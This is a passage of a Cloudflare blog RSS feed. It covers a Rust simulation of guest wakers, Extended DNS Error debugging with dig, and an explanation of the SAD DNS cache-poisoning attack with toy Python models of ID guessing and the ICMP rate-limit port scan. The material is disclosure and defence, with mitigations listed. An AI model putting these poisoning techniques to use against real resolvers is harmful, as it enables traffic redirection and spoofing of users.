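<p>The waker handshake can be condensed into a miniature simulation: the guest's first read parks a waker with the host, the host fires it when the "socket" becomes readable, and the next poll completes. All types and names here are illustrative, not BigPineapple's actual interface:</p>

```rust
use std::cell::Cell;
use std::collections::VecDeque;
use std::rc::Rc;

// Simplified guest-visible poll states, mirroring the pseudo poller above.
#[derive(Debug, PartialEq)]
enum Poll {
    Ready(String),
    Pending,
}

// Host side: owns the "real" socket and at most one parked guest waker.
#[derive(Default)]
struct Host {
    inbox: VecDeque<String>,      // data that has arrived on the socket
    waker: Option<Box<dyn Fn()>>, // stand-in for a trampoline call
}

impl Host {
    // hostcall_socket_read: hand over data if any; otherwise park the waker
    // so the guest task can be woken once the socket becomes readable.
    fn hostcall_socket_read(&mut self, wake: Box<dyn Fn()>) -> Poll {
        match self.inbox.pop_front() {
            Some(data) => Poll::Ready(data),
            None => {
                self.waker = Some(wake);
                Poll::Pending
            }
        }
    }

    // Host-side event: the socket became readable. Deliver the data and
    // fire the parked waker, as the host would do via the trampoline.
    fn on_socket_readable(&mut self, data: &str) {
        self.inbox.push_back(data.to_string());
        if let Some(wake) = self.waker.take() {
            wake();
        }
    }
}

fn main() {
    let mut host = Host::default();
    let woken = Rc::new(Cell::new(false));

    // First poll: no data yet, so the guest parks itself with a waker.
    let flag = Rc::clone(&woken);
    let first = host.hostcall_socket_read(Box::new(move || flag.set(true)));
    assert_eq!(first, Poll::Pending);
    assert!(!woken.get());

    // The socket becomes readable: the host fires the parked waker...
    host.on_socket_readable("dns response bytes");
    assert!(woken.get());

    // ...and the guest's next poll completes with the data.
    let second = host.hostcall_socket_read(Box::new(|| {}));
    assert_eq!(second, Poll::Ready("dns response bytes".to_string()));
}
```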
    <div>
      <h2>(Not) The End</h2>
      <a href="#not-the-end">
        
      </a>
    </div>
    <p>Hopefully, this blog post gave you a general idea of the innovative platform that powers 1.1.1.1. It is still evolving. As of today, several of our products, such as <a href="/introducing-1-1-1-1-for-families/">1.1.1.1 for Families</a>, <a href="/the-as112-project/">AS112</a>, and <a href="https://www.cloudflare.com/products/zero-trust/gateway/">Gateway DNS</a>, are supported by guest apps running on BigPineapple. We are looking forward to bringing new technologies into it. If you have any ideas, please let us know in the <a href="https://community.cloudflare.com/c/zero-trust/dns-1111/47">community</a> or via <a>email</a>.</p> ]]></content:encoded>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Resolver]]></category>
            <category><![CDATA[1.1.1.1]]></category>
            <guid isPermaLink="false">5DFx3mQoYWDfRP0BgOJ7fV</guid>
            <dc:creator>Anbang Wen</dc:creator>
            <dc:creator>Marek Vavruša</dc:creator>
        </item>
        <item>
            <title><![CDATA[Dig through SERVFAILs with EDE]]></title>
            <link>https://blog.cloudflare.com/dig-through-servfails-with-ede/</link>
            <pubDate>Wed, 25 May 2022 12:59:18 GMT</pubDate>
            <description><![CDATA[ Now we’re happy to announce we will return more error code types and include additional helpful information to further improve your debugging experience. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>It can be frustrating to get errors (SERVFAIL response codes) returned from your DNS queries. It can be even more frustrating if you don’t get enough information to understand why the error is occurring or what to do next. That’s why back in 2020, we <a href="/unwrap-the-servfail/">launched support</a> for Extended DNS Error (EDE) codes on 1.1.1.1.</p><p>As a quick refresher, EDE codes are a <a href="https://www.rfc-editor.org/rfc/rfc8914.html">proposed</a> IETF standard enabled by the Extension Mechanisms for DNS (EDNS) spec. The codes return extra information about DNS or <a href="https://www.cloudflare.com/learning/dns/dnssec/ecdsa-and-dnssec/">DNSSEC</a> issues without touching the RCODE so that debugging is easier.</p><p>Now we’re happy to announce we will return more error code types and include additional helpful information to further improve your debugging experience. Let’s run through some examples of how these error codes can help you better understand the issues you may face.</p><p>To try this for yourself, you’ll need to run the dig or kdig command in the terminal. For dig, please ensure you have <a href="http://ftp.swin.edu.au/isc/bind/9.11.20/RELEASE-NOTES-bind-9.11.20.html">v9.11.20</a> or above. If you are on macOS 12.1, by default you only have dig 9.10.6. <a href="https://formulae.brew.sh/formula/bind">Install</a> an updated version of BIND to fix that.</p><p>Let’s start with the output of an example dig command without EDE support.</p>
            <pre><code>% dig @1.1.1.1 dnssec-failed.org +noedns

; &lt;&lt;&gt;&gt; DiG 9.18.0 &lt;&lt;&gt;&gt; @1.1.1.1 dnssec-failed.org +noedns
; (1 server found)
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: SERVFAIL, id: 8054
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;dnssec-failed.org.		IN	A

;; Query time: 23 msec
;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)
;; WHEN: Thu Mar 17 10:12:57 PDT 2022
;; MSG SIZE  rcvd: 35</code></pre>
            <p>In the output above, we tried to do DNSSEC validation on <code>dnssec-failed.org</code>. It returns a <code>SERVFAIL</code>, but we don’t have context as to why.</p><p>Now let’s try that again with 1.1.1.1’s EDE support.</p>
            <pre><code>% dig @1.1.1.1 dnssec-failed.org +dnssec

; &lt;&lt;&gt;&gt; DiG 9.18.0 &lt;&lt;&gt;&gt; @1.1.1.1 dnssec-failed.org +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: SERVFAIL, id: 34492
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 1232
; EDE: 9 (DNSKEY Missing): (no SEP matching the DS found for dnssec-failed.org.)
;; QUESTION SECTION:
;dnssec-failed.org.		IN	A

;; Query time: 15 msec
;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)
;; WHEN: Fri Mar 04 12:53:45 PST 2022
;; MSG SIZE  rcvd: 103</code></pre>
            <p>We can see there is still a <code>SERVFAIL</code>. However, this time there is also an EDE code 9, which stands for “DNSKEY Missing”. Accompanying that, we also get additional information saying “no SEP matching the DS found” for <code>dnssec-failed.org</code>. That’s better!</p><p>Another nifty feature is that we will return multiple errors when appropriate, so you can debug each one separately. In the example below, we returned a <code>SERVFAIL</code> with three different error codes: “Unsupported DNSKEY Algorithm”, “No Reachable Authority”, and “Network Error”.</p>
            <pre><code>dig @1.1.1.1 [domain] +dnssec

; &lt;&lt;&gt;&gt; DiG 9.18.0 &lt;&lt;&gt;&gt; @1.1.1.1 [domain] +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: SERVFAIL, id: 55957
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 1232
; EDE: 1 (Unsupported DNSKEY Algorithm): (no supported DNSKEY algorithm for [domain].)
; EDE: 22 (No Reachable Authority): (at delegation [domain].)
; EDE: 23 (Network Error): (135.181.58.79:53 rcode=REFUSED for [domain] A)
;; QUESTION SECTION:
;[domain].		IN	A

;; Query time: 1197 msec
;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)
;; WHEN: Wed Mar 02 13:41:30 PST 2022
;; MSG SIZE  rcvd: 202</code></pre>
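Under the hood, each “EDE:” line above is carried as an EDNS0 option in the OPT pseudosection. RFC 8914 defines the option payload as a 2-byte INFO-CODE followed by optional UTF-8 EXTRA-TEXT. A minimal sketch of decoding that payload in Python (`parse_ede` is an illustrative helper, not part of any DNS library):

```python
import struct

EDE_OPTION_CODE = 15  # RFC 8914 assigns EDNS option code 15 to Extended DNS Errors

def parse_ede(option_data: bytes):
    """Decode one EDE option payload: 2-byte INFO-CODE + UTF-8 EXTRA-TEXT."""
    if len(option_data) < 2:
        raise ValueError("EDE option must carry at least a 2-byte INFO-CODE")
    (info_code,) = struct.unpack("!H", option_data[:2])  # network byte order
    extra_text = option_data[2:].decode("utf-8")         # not NUL-terminated
    return info_code, extra_text

# The "DNSKEY Missing" example from the dig output above, re-encoded by hand:
payload = struct.pack("!H", 9) + b"no SEP matching the DS found for dnssec-failed.org."
code, text = parse_ede(payload)
```

Because EXTRA-TEXT is free-form, a resolver can attach operator-specific hints, like the failing nameserver address seen in the “Network Error” example.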
            <p>Here’s a list of the additional codes we now support:</p><table><tr><td><p><b>Error Code Number</b></p></td><td><p><b>Error Code Name</b></p></td></tr><tr><td><p>1</p></td><td><p>Unsupported DNSKEY Algorithm</p></td></tr><tr><td><p>2</p></td><td><p>Unsupported DS Digest Type</p></td></tr><tr><td><p>5</p></td><td><p>DNSSEC Indeterminate</p></td></tr><tr><td><p>7</p></td><td><p>Signature Expired</p></td></tr><tr><td><p>8</p></td><td><p>Signature Not Yet Valid</p></td></tr><tr><td><p>9</p></td><td><p>DNSKEY Missing</p></td></tr><tr><td><p>10</p></td><td><p>RRSIGs Missing</p></td></tr><tr><td><p>11</p></td><td><p>No Zone Key Bit Set</p></td></tr><tr><td><p>12</p></td><td><p>NSEC Missing</p></td></tr></table><p>We have documented all the error codes we currently support with additional information you may find helpful. Refer to our <a href="https://developers.cloudflare.com/1.1.1.1/infrastructure/extended-dns-error-codes/">dev docs</a> for more information.</p> ]]></content:encoded>
            <category><![CDATA[1.1.1.1]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Resolver]]></category>
            <guid isPermaLink="false">1XKZPR2pJUZRG5bcY6CAqU</guid>
            <dc:creator>Stanley Chiang</dc:creator>
            <dc:creator>Marek Vavruša</dc:creator>
            <dc:creator>Anbang Wen</dc:creator>
        </item>
        <item>
            <title><![CDATA[SAD DNS Explained]]></title>
            <link>https://blog.cloudflare.com/sad-dns-explained/</link>
            <pubDate>Fri, 13 Nov 2020 19:06:13 GMT</pubDate>
            <description><![CDATA[ Researchers from UC Riverside and Tsinghua University found a new way to revive a decade-old DNS cache poisoning attack. Read our deep dive into how the SAD DNS attack on DNS resolvers works, how we protect against this attack in 1.1.1.1, and what the future holds for DNS cache poisoning attacks. ]]></description>
            <content:encoded><![CDATA[ <p>This week, at the <a href="https://www.sigsac.org/ccs/CCS2020/conference-program.html">ACM CCS 2020 conference</a>, researchers from UC Riverside and Tsinghua University announced a new attack against the <a href="https://www.cloudflare.com/learning/dns/what-is-dns/">Domain Name System (DNS)</a> called <a href="https://www.saddns.net/">SAD DNS</a> (Side channel AttackeD DNS). This attack leverages recent features of the networking stack in modern operating systems (like Linux) to allow attackers to revive a classic attack category: DNS cache poisoning. As part of a coordinated disclosure effort earlier this year, the researchers contacted Cloudflare and other major DNS providers and we are happy to announce that 1.1.1.1 Public Resolver is no longer vulnerable to this attack.</p><p>In this post, we’ll explain what the vulnerability was, how it relates to previous attacks of this sort, what mitigation measures we have taken to protect our users, and future directions the industry should consider to prevent this class of attacks from being a problem in the future.</p>
    <div>
      <h3>DNS Basics</h3>
      <a href="#dns-basics">
        
      </a>
    </div>
    <p>The Domain Name System (DNS) is what allows users of the Internet to get around without memorizing long sequences of numbers. What’s often called the “phonebook of the Internet” is more like a helpful system of translators that take natural language <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name/">domain names</a> (like blog.cloudflare.com or gov.uk) and translate them into the native language of the Internet: IP addresses (like 192.0.2.254 or [2001:db8::cf]). This translation happens behind the scenes so that users only need to remember hostnames and don’t have to get bogged down with remembering IP addresses.</p><p>DNS is both a system and a protocol. It refers to the hierarchical system of computers that manage the data related to naming on a network and it refers to the language these computers use to speak to each other to communicate answers about naming. The DNS protocol consists of pairs of messages that correspond to questions and responses. Each DNS question (query) and answer (reply) follows a standard format and contains a set of parameters that contain relevant information such as the name of interest (such as blog.cloudflare.com) and the type of response record desired (such as A for IPv4 or AAAA for IPv6).</p>
    <div>
      <h3>The DNS Protocol and Spoofing</h3>
      <a href="#the-dns-protocol-and-spoofing">
        
      </a>
    </div>
    <p>These DNS messages are exchanged over a network between machines using a transport protocol. Originally, DNS used UDP, a simple stateless protocol in which messages are endowed with a set of metadata indicating a source port and a destination port. More recently, DNS has adapted to use more complex transport protocols such as TCP and even advanced protocols like TLS or HTTPS, which incorporate encryption and strong authentication into the mix (see Peter Wu’s blog post about <a href="/dns-encryption-explained/">DNS protocol encryption</a>).</p><p>Still, the most common transport protocol for message exchange is UDP, which has the advantages of being fast, ubiquitous and requiring no setup. Because UDP is stateless, the pairing of a response to an outstanding query is based on two main factors: the source address and port pair, and information in the DNS message. Given that UDP is both stateless and unauthenticated, anyone, and not just the recipient, can send a response with a forged source address and port, which opens up a range of potential problems.</p>
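Put concretely, everything that pairs a UDP reply with a pending query fits in a few comparisons. A simplified Python model (the field names are illustrative) of what a resolver can check, and therefore what a blind spoofer must guess:

```python
def matches_pending_query(pending, reply):
    """All the checks pairing a UDP DNS reply to an outstanding query."""
    return (
        reply["src_addr"] == pending["dst_addr"]      # must appear to come from the server
        and reply["dst_port"] == pending["src_port"]  # must hit the right ephemeral port
        and reply["id"] == pending["id"]              # 16-bit transaction ID (the entropy)
        and reply["qname"] == pending["qname"]        # trivially guessable by the attacker
        and reply["qtype"] == pending["qtype"]        # trivially guessable by the attacker
    )

pending = {"dst_addr": "192.0.2.53", "src_port": 50000, "id": 0x1A2B,
           "qname": "blog.cloudflare.com.", "qtype": "A"}
genuine = {"src_addr": "192.0.2.53", "dst_port": 50000, "id": 0x1A2B,
           "qname": "blog.cloudflare.com.", "qtype": "A"}
spoofed = dict(genuine, id=0x0000)  # attacker knows everything except the ID
```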
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/dCFbp5FSjzJUvxRtOx371/3905b3efe9706c5044b5399aacca28d8/image4-6.png" />
            
            </figure><p>The blue portions contribute randomness</p><p>Since the transport layer is inherently unreliable and untrusted, the DNS protocol was designed with additional mechanisms to protect against forged responses. The first two bytes in the message form a message or transaction ID that must be the same in the query and response. When a DNS client sends a query, it will set the ID to a random value and expect the value in the response to match. This unpredictability introduces entropy into the protocol, which makes it less likely that a malicious party will be able to construct a valid DNS reply without first seeing the query. There are other variables to account for: the DNS query name and query type are also used to pair query and response, but these are trivial to guess and don’t introduce additional entropy.</p><p>Those paying close attention to the diagram may notice that the amount of entropy introduced by this measure is only around 16 bits, which means that there are fewer than a hundred thousand possibilities to go through to find the matching reply to a given query. More on this later.</p>
    <div>
      <h3>The DNS Ecosystem</h3>
      <a href="#the-dns-ecosystem">
        
      </a>
    </div>
    <p>DNS servers fall into two main categories: recursive resolvers (like 1.1.1.1 or 8.8.8.8) and authoritative nameservers (like the <a href="/f-root/">DNS root servers</a> or <a href="https://www.cloudflare.com/dns/">Cloudflare Authoritative DNS</a>). There are also elements of the ecosystem that act as “forwarders”, such as <a href="http://www.thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a>. In a typical DNS lookup, these DNS servers work together to complete the task of delivering the IP address for a specified domain to the client (the client is usually a stub resolver, a simple resolver built into an operating system). For more detailed information about the DNS ecosystem, take a look at <a href="https://www.cloudflare.com/learning/dns/dns-server-types/">our learning site</a>. The SAD DNS attack targets the communication between recursive resolvers and nameservers.</p><p>Each of the participants in DNS (client, resolver, nameserver) uses the DNS protocol to communicate with the others. Most of the latest innovations in DNS revolve around <a href="/dns-encryption-explained/">upgrading the transport</a> between users and recursive resolvers to use encryption. Upgrading the transport protocol between resolvers and authoritative servers is a bit more complicated, as it requires a new discovery mechanism to instruct the resolver when (and when not) to use a more secure channel. Aside from a few examples like <a href="/encrypting-dns-end-to-end/">our work with Facebook</a> to encrypt recursive-to-authoritative traffic with DNS-over-TLS, most of these exchanges still happen over UDP. This is the core issue that enables this new attack on DNS, and one that we’ve seen before.</p>
    <div>
      <h3>Kaminsky’s Attack</h3>
      <a href="#kaminskys-attack">
        
      </a>
    </div>
    <p>Prior to 2008, recursive resolvers typically used a single open port (usually port 53) to send and receive messages to authoritative nameservers. This made guessing the source port trivial, so the only variable an attacker needed to guess to forge a response to a query was the 16-bit message ID. The attack <a href="https://www.linuxjournal.com/content/understanding-kaminskys-dns-bug">Kaminsky described</a> was relatively simple: whenever a recursive resolver queried the authoritative name server for a given domain, an attacker would flood the resolver with DNS responses for some or all of the 65 thousand or so possible message IDs. If the malicious answer with the right message ID arrived before the response from the authoritative server, then the DNS cache would be effectively poisoned, returning the attacker’s chosen answer instead of the real one for as long as the DNS response was valid (called the TTL, or time-to-live).</p><p>For popular domains, resolvers contact authoritative servers once per TTL (which can be as short as 5 minutes), so there are plenty of opportunities to mount this attack. Forwarders that cache DNS responses are also vulnerable to this type of attack.</p>
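A rough model of the attacker’s odds, assuming one burst of forged replies per poisoning window (i.e. per TTL expiry) and ignoring packet timing:

```python
import math

def windows_until_likely_success(forged_per_window, id_space=2**16, target=0.5):
    """Poisoning windows needed before cumulative success probability reaches target."""
    p = forged_per_window / id_space          # chance of winning the race in one window
    # (1 - p)**k <= 1 - target  =>  k >= log(1 - target) / log(1 - p)
    return math.ceil(math.log(1 - target) / math.log(1 - p))

# With ~100 forged replies landing per window, a 50/50 chance takes a few
# hundred windows; at a 5-minute TTL, that is on the order of a day or two.
windows = windows_until_likely_success(forged_per_window=100)
```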
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1UE6h36FxkzSRIJlh4HQj4/843403c141ee61cf047365a9b8e7a0f5/image3-4.png" />
            
            </figure><p>In response to this attack, DNS resolvers started doing source port randomization and careful checking of the security ranking of cached data. To poison these updated resolvers, forged responses would not only need to guess the message ID, but they would also have to guess the source port, bringing the number of guesses from the tens of thousands to over a billion. This made the attack effectively infeasible. Furthermore, the IETF published <a href="https://tools.ietf.org/html/rfc5452">RFC 5452</a> on how to harden DNS from guessing attacks.</p><p>It should be noted that this attack did not work for DNSSEC-signed domains since their answers are digitally signed. However, even now in 2020, DNSSEC is far from universal.</p>
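The jump “from the tens of thousands to over a billion” is easy to verify: source port randomization multiplies the 16-bit message-ID space by roughly another 16 bits of port entropy (the exact usable range is a little smaller, since low ports are reserved):

```python
message_ids = 2 ** 16                   # 16-bit DNS transaction ID: 65,536 values
ephemeral_ports = 65535 - 1024          # usable randomized source ports, roughly

before = message_ids                    # fixed source port: guess the ID only
after = message_ids * ephemeral_ports   # with source port randomization

# after is about 4.2 billion -- "over a billion" blind guesses per query
```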
    <div>
      <h3>Defeating Source Port Randomization with Fragmentation</h3>
      <a href="#defeating-source-port-randomization-with-fragmentation">
        
      </a>
    </div>
    <p>Another way to avoid having to guess the source port number and message ID is to split the DNS response in two. As is often the case in computer security, old attacks become new again when attackers discover new capabilities. In 2012, researchers Amir Herzberg and Haya Schulman from Bar Ilan University <a href="https://arxiv.org/pdf/1205.4011.pdf">discovered</a> that it was possible for a remote attacker to defeat the protections provided by source port randomization. This new attack leveraged another feature of UDP: fragmentation. For a primer on the topic of UDP fragmentation, check out our <a href="/ip-fragmentation-is-broken/">previous blog post</a> on the subject by Marek Majkowski.</p><p>The key to this attack is the fact that all the randomness that needs to be guessed in a DNS poisoning attack is concentrated at the beginning of the DNS message (UDP header and DNS header). If the UDP response packet (sometimes called a datagram) is split into two fragments, the first half containing the message ID and source port and the second containing part of the DNS response, then all an attacker needs to do is forge the second fragment and make sure that the fake second fragment arrives at the resolver before the true second fragment does. When a datagram is fragmented, each fragment is assigned a 16-bit ID (called the IP-ID), which is used to reassemble it at the receiving end. Since the second fragment only has the IP-ID as entropy (again, this is a familiar refrain in this area), this attack is feasible with a relatively small number of forged packets. The downside of this attack is the precondition that the response must be fragmented in the first place, and that the forged fragment must be carefully crafted to pass the original section counts and the UDP checksum.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6HX4qrdRButwYt5dYR5wum/3d6b5054b4d782279417484a12553bda/image5-1.png" />
            
            </figure><p>Also discussed in the original and <a href="https://pki.cad.sit.fraunhofer.de/media/doc-CCS2018.pdf">follow-up papers</a> is a method of forcing two remote servers to send packets to each other that are fragmented at an attacker-controlled point, making this attack much more feasible. The details are in the paper, but it boils down to the fact that the control mechanism for describing the maximum transmission unit (MTU) between two servers -- which determines at which point packets are fragmented -- can be set via a forged UDP packet.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/21fbVKVHIVx78Vr9H0kIo3/1b9012b11ef9a6bb39920b2429dba302/image1-8.png" />
            
            </figure><p>We explored this risk last year in the context of certificate issuance, when we introduced our <a href="/secure-certificate-issuance/">multi-path DCV service</a>, which mitigates it by making DNS queries from multiple vantage points. Nevertheless, fragmentation-based attacks are proving less and less effective as DNS providers move to eliminate support for fragmented DNS packets (one of the major goals of <a href="https://dnsflagday.net/2020/">DNS Flag Day 2020</a>).</p>
    <div>
      <h3>Defeating Source Port Randomization via ICMP error messages</h3>
      <a href="#defeating-source-port-randomization-via-icmp-error-messages">
        
      </a>
    </div>
    <p>Another way to defeat source port randomization is to use some measurable property of the server that makes the source port easier to guess. If the attacker could ask the server which port number is being used for a pending query, constructing a spoofed packet would be much easier. No such thing exists, but it turns out there is something close enough: the attacker can discover which ports are surely closed (and thus avoid having to send traffic to them). One such mechanism is the ICMP “port unreachable” message.</p><p>Say the target receives a UDP datagram destined for its IP and some port. The datagram is either accepted and silently discarded by the application, or rejected because the port is closed. If the port is closed, or more importantly, closed to the IP address that the UDP datagram was sent from, the target will send back an ICMP message notifying the sender that the port is closed. This is handy to know, since the attacker no longer has to guess pending message IDs on that port and can move on to other ports. A single scan of the server effectively reduces the search space of valid UDP responses from 2<sup>32</sup> (over four billion) to 2<sup>17</sup> (around a hundred thousand), at least in theory.</p><p>This trick doesn’t always work. Many resolvers use “connected” UDP sockets instead of “open” UDP sockets to exchange messages between the resolver and nameserver. Connected sockets are tied to the peer address and port at the OS layer, which makes it impossible for an attacker to guess which “connected” UDP sockets are established between the target and the victim, and since the attacker isn’t the victim, it can’t directly observe the outcome of the probe.</p><p>To overcome this, the researchers found a very clever trick: they leverage ICMP rate limits as a side channel to reveal whether a given port is open or not. 
ICMP rate limiting was introduced (somewhat ironically, given this attack) as a security feature to prevent a server from being used as an unwitting participant in a <a href="https://www.cloudflare.com/learning/ddos/smurf-ddos-attack/">reflection attack</a>. In broad terms, it is used to limit how many ICMP responses a server will send out in a given time period. Say an attacker wanted to scan 10,000 ports and sent a burst of 10,000 UDP packets to a server configured with an ICMP rate limit of 50 per second, then only the first 50 would get an ICMP “port unreachable” message in reply.</p><p>Rate limiting seems innocuous until you remember one of the core rules of data security: <i>don’t let private information influence publicly measurable metrics</i>. ICMP rate limiting violates this rule because the rate limiter’s behavior can be influenced by an attacker making guesses as to whether a “secret” port number is open or not.</p><blockquote><p><i>don’t let private information influence publicly measurable metrics</i></p></blockquote><p>An attacker wants to know whether the target has an open port, so it sends a spoofed UDP message from the authoritative server to that port. If the port is open, no ICMP reply is sent and the rate counter remains unchanged. If the port is inaccessible, then an ICMP reply is sent (back to the authoritative server, not to the attacker) and the rate is increased by one. Although the attacker doesn’t see the ICMP response, it has influenced the counter. The counter itself isn’t known outside the server, but whether it has hit the rate limit or not <i>can</i> be measured by any outside observer by sending a UDP packet and waiting for a reply. If an ICMP “port unreachable” reply comes back, the rate limit hasn’t been reached. No reply means the rate limit has been met. 
This leaks one bit of information about the counter to the outside observer, which in the end is enough to reveal the supposedly secret information (whether the spoofed request got through or not).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4VZjJoJhfSuFB0QjVY74Xz/25462293f51df83350c36c5fe6090fa3/image2-7.png" />
            
            </figure><p>Diagram inspired by <a href="https://www.sigsac.org/ccs/CCS2020/conference-program.html">original paper</a></p><p>Concretely, the attack works as follows: the attacker sends a bunch of probe messages (enough to trigger the rate limiting) to the target, but with the forged source address of the victim. If there are no open ports in the probed set, the target will send the same number of ICMP “port unreachable” responses back to the victim and trigger the rate limit on outgoing ICMP messages. The attacker can now send an additional verification message from its own address and observe whether an ICMP response comes back. If it does, there was at least one open port in the set, and the attacker can divide the set and try again, or do a linear scan by inserting the suspected port number into a set of known-closed ports. Using this approach, the attacker can narrow down the open ports and try to guess the message ID until it succeeds or gives up, similarly to the original Kaminsky attack.</p><p>In practice there are some hurdles to successfully mounting this attack.</p><ul><li><p>First, the target IP, or a set of target IPs, must be discovered. This might be trivial in some cases (a single forwarder, or a fixed set of IPs that can be discovered by probing and observing attacker-controlled zones), but more difficult if the target IPs are partitioned across zones, as the attacker can’t see the resolver egress IP unless she can monitor the traffic for the victim domain.</p></li><li><p>The attack also requires a large enough outgoing ICMP rate limit to scan at a reasonable speed. The scan speed is critical, as the scan must complete while the query to the victim nameserver is still pending. 
As the scan speed is effectively fixed, the paper instead describes a method to potentially extend the window of opportunity by triggering the victim's <a href="https://kb.isc.org/docs/aa-01000">response rate limiting</a> (RRL), a technique to protect against floods of forged DNS queries. This may work if the victim implements RRL and the target resolver doesn’t implement a retry over TCP (<a href="https://casey.byu.edu/papers/2019_icnc_dns_rate_limit.pdf">A Quantitative Study of the Deployment of DNS Rate Limiting</a> shows about 16% of nameservers implement some sort of RRL).</p></li><li><p>Generally, busy resolvers will have ephemeral ports opening and closing, which introduces false positive open ports for the attacker, and ports open for different pending queries than the one being attacked.</p></li></ul><p>We’ve implemented an additional mitigation to 1.1.1.1 to prevent message ID guessing - if the resolver detects an ID enumeration attempt, it will stop accepting any more guesses and switches over to TCP. This reduces the number of attempts for the attacker even if it guesses the IP address and port correctly, similarly to how the number of password login attempts is limited.</p>
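The rate-limit side channel described above lends itself to a toy simulation. The Python sketch below models only the shared, global ICMP budget (the `Server` class, the port numbers, and the 50-per-window limit are invented for illustration; a real scan also contends with timing, noise, and window resets):

```python
# Toy model of the ICMP global rate-limit side channel (illustrative only).
# The server answers closed-port probes with ICMP "port unreachable", but
# sends at most `limit` ICMP replies per time window, shared across senders.

class Server:
    def __init__(self, open_ports, limit=50):
        self.open_ports = set(open_ports)
        self.limit = limit
        self.icmp_sent = 0  # resets each window

    def new_window(self):
        self.icmp_sent = 0

    def probe(self, port):
        """Returns True if an ICMP 'port unreachable' reply goes out."""
        if port in self.open_ports:
            return False                 # open port: datagram silently consumed
        if self.icmp_sent < self.limit:
            self.icmp_sent += 1
            return True
        return False                     # rate limit hit: silence

def set_contains_open_port(server, ports):
    """Attacker: spoof `limit` probes from the victim, then verify from own IP."""
    server.new_window()
    for port in ports[: server.limit]:
        server.probe(port)               # spoofed; any replies go to the victim
    # Verification probe from the attacker's own (closed-port) vantage point:
    return server.probe(0)               # ICMP back => budget left => open port in set

srv = Server(open_ports={33853}, limit=50)
batch_a = list(range(1000, 1050))        # 50 closed ports: budget exhausted
batch_b = list(range(33820, 33870))      # contains the open port 33853
```

One verification probe per window thus answers “did any of my 50 spoofed probes hit an open port?”, which is exactly the one bit the attacker needs.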
    <div>
      <h3>Outlook</h3>
      <a href="#outlook">
        
      </a>
    </div>
    <p>Ultimately these are just mitigations, and the attacker might be willing to play the long game. As long as the transport layer is insecure and DNSSEC is not widely deployed, there will be different methods of chipping away at these mitigations.</p><p>It should be noted that trying to hide source IPs or open port numbers is a form of security through obscurity. Without strong cryptographic authentication, it will always be possible to use spoofing to poison DNS resolvers. The silver lining here is that DNSSEC exists and is designed to protect against exactly this type of attack, and DNS servers are <a href="https://datatracker.ietf.org/doc/html/draft-ietf-dprive-phase2-requirements-02">moving to explore</a> cryptographically strong transports such as TLS for communication between resolvers and authoritative servers.</p><p>At Cloudflare, we’ve been helping to reduce the friction of DNSSEC deployment, while also <a href="/encrypting-dns-end-to-end/">helping to improve transport security in the long run</a>. There is also an effort to increase entropy in DNS messages with <a href="https://tools.ietf.org/html/rfc7873">RFC 7873 - Domain Name System (DNS) Cookies</a>, to make DNS over TCP support mandatory with <a href="https://tools.ietf.org/html/rfc7766">RFC 7766 - DNS Transport over TCP - Implementation Requirements</a>, and even more <a href="https://datatracker.ietf.org/doc/html/draft-wijngaards-dnsext-resolver-side-mitigation-01">documentation</a> on ways to mitigate this type of issue is available in various places. All of these efforts are complementary, which is a good thing. 
The DNS ecosystem consists of many different parties and software with different requirements and opinions; as long as operators support at least one of these preventive measures, attacks of this type will become more and more difficult.</p><p>If you operate a DNS forwarder or recursive DNS resolver, you should consider taking the following steps to protect yourself from this attack:</p><ul><li><p>Upgrade your Linux kernel with <a href="https://git.kernel.org/linus/b38e7819cae946e2edf869e604af1e65a5d241c5">https://git.kernel.org/linus/b38e7819cae946e2edf869e604af1e65a5d241c5</a> (included in v5.10), which makes the ICMP rate limit unpredictable</p></li><li><p>Block the outgoing ICMP “port unreachable” messages with iptables or lower the ICMP rate limit on Linux</p></li><li><p>Keep your DNS software up to date</p></li></ul><p>We’d like to thank the researchers for responsibly disclosing this attack and look forward to working with them in the future on efforts to strengthen the DNS.</p> ]]></content:encoded>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">2OIMCvAglmZug8ev7RgC92</guid>
            <dc:creator>Marek Vavruša</dc:creator>
            <dc:creator>Nick Sullivan</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare analyzes 1M DNS queries per second]]></title>
            <link>https://blog.cloudflare.com/how-cloudflare-analyzes-1m-dns-queries-per-second/</link>
            <pubDate>Wed, 10 May 2017 21:50:20 GMT</pubDate>
            <description><![CDATA[ On Friday, we announced DNS analytics for all Cloudflare customers. Because of our scale –– by the time you’ve finished reading this, Cloudflare DNS will have handled millions of DNS queries –– we had to be creative in our implementation.  ]]></description>
